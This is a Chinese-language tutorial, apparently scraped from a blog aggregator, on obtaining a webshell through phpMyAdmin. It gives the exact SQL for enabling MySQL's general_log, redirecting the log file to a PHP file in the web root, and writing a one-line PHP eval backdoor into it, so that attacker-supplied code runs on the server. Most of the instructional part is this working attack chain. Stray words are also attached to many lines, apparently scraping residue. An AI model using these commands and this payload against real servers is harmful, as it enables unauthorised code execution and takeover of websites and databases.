经过 phpmyadmin getshell
经过 phpmyadmin getshellphp
general_log默认为关闭的,root权限开启后,general_log_file会保存全部的查询语句python
能够开启general_log,而后设置general_log_file为一个php文件,最后用一句话木马进行查询来获取shellshell
进入phpmyadmin后在SQL处执行SQL语句3d
首先查看general log是否开启code
show variables like 'general_log';
general log是关闭状态,执行SQL语句开启general logblog
SET GLOBAL general_log = ON
开启成功get
而后把general_log_file设置为shell的绝对路径class
SET global general_log_file='D:/wamp/www/orange.php';
看下刚刚建立的orange.php里的内容file
而后执行SQL查询语句,写个一句话进去。权限
SELECT '<?php @eval($_POST["orange"]);?>';
如今再看下orange.php里面的内容
成功插入了一句话木马
一句话连接在根目录(http://127.0.0.1/orange.php)
至此结束!
任重而道远!
相关文章
- 1. 经过 phpmyadmin getshell
- 2. phpmyadmin+日志getshell
- 3. phpmyadmin getshell到提权
- 4. phpmyadmin之getshell总结
- 5. phpmyadmin getshell两种思路
- 6. getshell之Phpmyadmin写日志
- 7. phpMyAdmin checkPageValidity 函数缺陷可致使 GETSHELL
- 8. 经过yum安装lnmp-phpmyadmin
- 9. getshell之后难忘的经历
- 10. phpmyadmin4.8.1后台getshell
- 更多相关文章...
- • PHP imageaffine - 返回经过仿射变换后的图像 - PHP参考手册
- • jQuery Mobile 过渡 - jQuery Mobile 教程
- • 为了进字节跳动,我精选了29道Java经典算法题,带详细讲解
- • PHP开发工具
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
欢迎关注本站公众号,获取更多信息
